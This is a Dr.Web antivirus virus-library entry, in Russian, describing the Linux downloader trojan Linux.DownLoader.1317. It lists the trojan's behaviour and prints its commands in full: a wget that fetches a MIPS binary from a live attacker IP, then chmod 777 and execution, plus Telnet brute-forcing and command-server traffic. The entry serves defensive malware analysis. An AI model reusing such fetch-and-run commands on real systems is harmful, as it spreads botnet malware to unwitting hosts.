Защити созданное

Другие наши ресурсы

  • free.drweb.uz — бесплатные утилиты, плагины, информеры
  • av-desk.com — интернет-сервис для поставщиков услуг Dr.Web AV-Desk
  • curenet.drweb.uz — сетевая лечащая утилита Dr.Web CureNet!
  • www.drweb.uz/web-iq — ВебIQметр
Закрыть

Библиотека
Моя библиотека

Чтобы добавить ресурс в библиотеку, войдите в аккаунт.

+ Добавить в библиотеку

Ресурсов: -

Последний: -

Моя библиотека

Поиск

Поиск

Поддержка
Круглосуточная поддержка | Правила обращения

Напишите

Запрос через форму

Позвоните

Бесплатно по России:
8-800-333-79-32

ЧаВо | Форум

Ваши запросы

  • Все: -
  • Незакрытые: -
  • Последний: -
Создать новый запрос Частые вопросы

Позвоните

Бесплатно по России:
8-800-333-79-32

Свяжитесь с нами Незакрытые запросы: 

Профиль

Профиль

UZ

RU CN DE EN ES FR IT JP KZ UZ PL BY
Закрыть
Сервисы
Сканеры
Dr.Web vxCube
Демо
Экспертиза ВКИ
Вирусная библиотека
База знаний

Технологии

Термины

Обучение и просвещение

Мифы

Новости

Linux.DownLoader.1317

Добавлен в вирусную базу Dr.Web: 2019-08-08

Описание добавлено:

Technical Information

Malicious functions:
Removes itself
Launches itself as a daemon
Launches processes:
  • sh -c wget http://34.67.138.200/dark_bins/dark.mips; chmod 777 *; ./dark.mips wget.loader.mips
  • wget http://34.67.138.200/dark_bins/dark.mips
  • chmod 777 dark.mips run.sh stdout.log
  • ./dark.mips wget.loader.mips
  • sh -c rm -rf hmips
  • rm -rf hmips
Performs operations with the file system:
Modifies file access rights:
  • /root/dark.mips
  • /root/run.sh
Creates or modifies files:
  • /root/dark.mips
Deletes files:
  • /root/hmips
Network activity:
Establishes connection:
  • 8.#.8.8:53
  • 34.##.138.200:1791
Attacks using a special dictionary (brute-force technique) via the Telnet protocol.
HTTP GET requests:
  • 34.##.###.200/dark_bins/dark.mips
Sends data to the following servers:
  • 34.##.138.200:1791
Receives data from the following servers:
  • 34.##.138.200:1791

Рекомендации по лечению

Linux

На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.

Демо бесплатно

На 1 месяц (без регистрации) или 3 месяца (с регистрацией и скидкой на продление)

Скачать Dr.Web

По серийному номеру